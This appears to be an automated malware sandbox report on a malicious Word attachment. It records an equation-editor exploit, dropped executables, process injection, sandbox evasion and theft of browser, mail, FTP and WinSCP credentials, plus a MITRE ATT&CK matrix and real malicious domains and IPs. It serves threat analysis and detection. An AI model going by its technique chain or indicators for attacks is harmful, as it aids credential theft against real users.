                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 22F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 910000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 380000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 23F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 530000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 58D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 5620000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 68D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 78D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 23D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: A20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\html.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3168Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exe TID: 3240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exe TID: 3352Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3556Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3588Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 4048Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3792Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3212Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3012Thread sleep count: 200 > 30
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe TID: 3012Thread sleep count: 100 > 30
                      Source: C:\Users\user\AppData\Roaming\html.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\html.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\html.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_8-487
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_8-451
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_8-510
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_036106F7 mov edx, dword ptr fs:[00000030h]8_2_036106F7
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory written: C:\Users\user\AppData\Roaming\html.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory written: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory written: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeProcess created: C:\Users\user\AppData\Roaming\html.exe "C:\Users\user\AppData\Roaming\html.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess created: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe "C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe"
                      Source: C:\Users\user\AppData\Roaming\html.exeQueries volume information: C:\Users\user\AppData\Roaming\html.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeQueries volume information: C:\Users\user\AppData\Roaming\html.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeQueries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeQueries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeQueries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeQueries volume information: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe VolumeInformation
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
                      Source: Yara matchFile source: 9.2.html.exe.28cf3d0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.4f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.251d10c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.251e124.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.2c4d040.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.2c13268.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.219f414.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.2c4e058.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.219f414.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.28cf3d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.24e3334.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 4088, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Roaming\html.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeDirectory queried: number of queries: 1006
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.656194441.0000000002407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.455352786.0000000002340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.656186717.00000000028D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 4088, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
                      Source: Yara matchFile source: 9.2.html.exe.28cf3d0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.4f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.251d10c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.251e124.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.2c4d040.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.2c13268.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.219f414.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.2c4e058.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.219f414.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.28cf3d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.mpTrle.exe.24e3334.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.398826908.00000000004F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399016918.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.421607400.0000000002151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.421607400.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399016918.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.mpTrle.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b55730.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.html.exe.3b1a710.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000C.00000002.452977021.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.399205246.0000000003B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: html.exe PID: 3296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 3532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: mpTrle.exe PID: 4088, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts121
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      11
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      35
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts33
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      24
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder
                      1
                      Registry Run Keys / Startup Folder
                      31
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      21
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      3
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object Model1
                      Input Capture
                      24
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets141
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Hidden Files and Directories
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436756 Sample: REQUEST FOR QUOTATION.docx.doc Startdate: 06/05/2024 Architecture: WINDOWS Score: 100 56 wbze.de 2->56 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 22 other signatures 2->76 9 WINWORD.EXE 306 60 2->9         started        14 mpTrle.exe 2 2->14         started        16 mpTrle.exe 2->16         started        signatures3 process4 dnsIp5 66 wbze.de 109.71.253.25, 443, 49161, 49162 ATLANTIACLOUDNL Germany 9->66 68 104.168.33.34, 49170, 49172, 80 AS-COLOCROSSINGUS United States 9->68 46 C:\Users\user\AppData\Roaming\...\u7xc.url, MS 9->46 dropped 48 C:\Users\user\...\rz on 104.168.33.34.url, MS 9->48 dropped 50 ~WRF{1CB57AA5-D007...0-7D791EC5AD43}.tmp, Composite 9->50 dropped 52 2 other malicious files 9->52 dropped 96 Microsoft Office launches external ms-search protocol handler (WebDAV) 9->96 98 Office viewer loads remote template 9->98 100 Microsoft Office drops suspicious files 9->100 18 EQNEDT32.EXE 12 9->18         started        22 AcroRd32.exe 9->22         started        102 Antivirus detection for dropped file 14->102 104 Multi AV Scanner detection for dropped file 14->104 106 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->106 108 Machine Learning detection for dropped file 14->108 24 mpTrle.exe 12 2 14->24         started        110 Injects a PE file into a foreign processes 16->110 27 mpTrle.exe 16->27         started        file6 signatures7 process8 dnsIp9 40 C:\Users\user\AppData\Roaming\html.exe, PE32 18->40 dropped 42 C:\Users\user\AppData\Local\...\html[1].exe, PE32 18->42 dropped 78 Office equation editor establishes network connection 18->78 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 18->80 29 html.exe 1 7 18->29         started        32 RdrCEF.exe 22->32         started        60 172.67.74.152, 443, 49174 CLOUDFLARENETUS United States 24->60 62 api.ipify.org 24->62 64 api.ipify.org 27->64 82 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->82 84 Tries to steal Mail credentials (via file / registry access) 27->84 86 Tries to harvest and steal ftp login credentials 27->86 88 Tries to harvest and steal browser information (history, passwords, etc) 27->88 file10 signatures11 process12 dnsIp13 112 Antivirus detection for dropped file 29->112 114 Multi AV Scanner detection for dropped file 29->114 116 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 29->116 118 2 other signatures 29->118 35 html.exe 13 4 29->35         started     